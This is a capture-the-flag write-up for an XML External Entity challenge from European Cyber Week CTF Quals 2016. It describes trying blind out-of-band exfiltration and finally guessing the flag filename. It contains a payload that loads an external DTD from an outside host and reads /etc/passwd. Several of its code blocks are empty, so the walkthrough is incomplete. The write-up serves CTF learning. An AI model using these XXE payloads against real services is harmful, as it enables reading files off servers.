Information#
Version#
| By | Version | Comment |
|---|---|---|
| noraj | 1.0 | Creation |
CTF#
- Name : European Cyber Week CTF Quals 2016
- Website : challenge-ecw.fr
- Type : Online
- Format : Jeopardy - Student
Description#
N.A.
Solution#
This one is a XML External Entity ([XXE][xxe]) attack and Out-Of-Band (OOB) channel exfiltration is not working.
We are given the following form:
1 | <contacts> |
And the following answer confirming the well formated XML request:
1 | Création du fichier ./MNfloDfo.xml |
We should be able to leak data into the answer banner.
Confirmation that entities are interpreted:
1 |
|
1 | Création du fichier ./J2tuDR8g.xml |
Nice that's working so try to leak some files:
1 |
=> doesn't work
1 |
=> doesn't work
1 |
=> doesn't work
[...] and we tried a lot of logical filename on various operating systems.
But how did we find out the right? The challenge required no logic but only guessing ...
I firstly thought the banner was useless because no file was leaked in it. So I thought it was some blind xxe:
1 | <!DOCTYPE contacts [ <!ENTITY % pe SYSTEM "http://example.org/xxe_file"> %pe; %param1; ]> |
xxe_file:
1 | <!ENTITY % payload SYSTEM "file:///etc/passwd"> |
And a tried a lot...
But no, in fact no files were leakable exept flag.txt. It was impossible to find out it was just guessing because rules and description didn't mention any convention.
I passed hours on days to craft sophishticated blind xxe requests and it was only a very easy xxe but filename had to be guessed, it was easy to think that xxe was not working as others files was not leaked.
Realistic challenge should have be better.
But indeed some people find it realy easily as flag.txt can be common in CTF.
I insist on the fact that's is only CTF guessing, in real life this never occurs.
Here was the easy XXE :
1 |
|
1 | Création du fichier ./WDpFYEM5.xml |